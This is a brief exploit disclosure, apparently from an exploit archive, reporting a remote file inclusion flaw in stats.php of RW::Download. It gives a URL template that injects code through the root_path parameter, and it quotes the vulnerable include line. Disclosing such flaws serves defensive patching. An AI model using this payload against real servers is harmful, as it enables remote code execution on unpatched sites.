RW::Download is susceptible to a remote file inclusion flaw via stats.php.
33087d3e6184e6f2bbd1e00f1a220a7507b77772fd80e7ab892255beb2ef0016
Title : RW::Download stats.php Remote File Inc.
-
Site : http://www.Cyber-Warrior.org
-
Author : StorMBoY
-
Mail : StorMBoY@BsdMail.Org
-
exploit : http://target/path/stats.php?root_path=code]
-
Inc. Code : include_once $ROOT_PATH."functions/global_functions.php";
-
# StorMBoY [08.07.2006]